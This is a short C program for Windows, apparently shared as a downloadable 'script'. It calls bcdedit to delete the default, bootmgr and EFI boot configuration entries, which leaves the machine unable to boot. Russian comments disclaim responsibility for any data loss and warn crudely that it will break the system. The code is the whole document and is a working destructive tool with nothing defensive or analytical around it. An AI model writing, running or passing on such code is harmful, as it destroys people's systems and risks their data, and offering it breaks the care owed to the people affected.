// При компиляции или редактировании скрипта с мамамонке снимается любая ответственность.
// Скачивая скрипт вы соглашаетесь что в случае потери файлов виноваты ВЫ!
// Открывая скрипт в любом IDE с мамамонке снимается любая ответственность.
#include <stdio.h>
#include <windows.h>
// При компиляции или редактировании скрипта с мамамонке снимается любая ответственность.
// Скачивая скрипт вы соглашаетесь что в случае потери файлов виноваты ВЫ!
// Открывая скрипт в любом IDE с мамамонке снимается любая ответственность.
int main(void)
{
    if (!system("bcdedit /delete {default}"))
        printf("уделил{default}\n");
    else
    {
        fprintf(stderr, "ошибка удаления{default}\n");
        return 1;
    }
    if (!system("bcdedit /delete {bootmgr}"))
        printf("удалил{bootmgr}\n");
    else
    {
        fprintf(stderr, "ошибка удаления{bootmgr}\n");
        return 1;
    }
    if (!system("bcdedit /delete {efi}"))
        printf("удалил{efi}\n");
    else
    {
        fprintf(stderr, "ошибка удаления{efi}\n");
        return 1;
    }
    return 0;
}
// Не используйте эту залупу. Она вам нахуй систему сломает.
// Мамамонке не несёт ответственности за потерянные данные после использования этого скрипта.
// При компиляции или редактировании скрипта с мамамонке снимается любая ответственность.
// Скачивая скрипт вы соглашаетесь что в случае потери файлов виноваты ВЫ!
// Открывая скрипт в любом IDE с мамамонке снимается любая ответственность.
// Используйте на свой страх и риск!
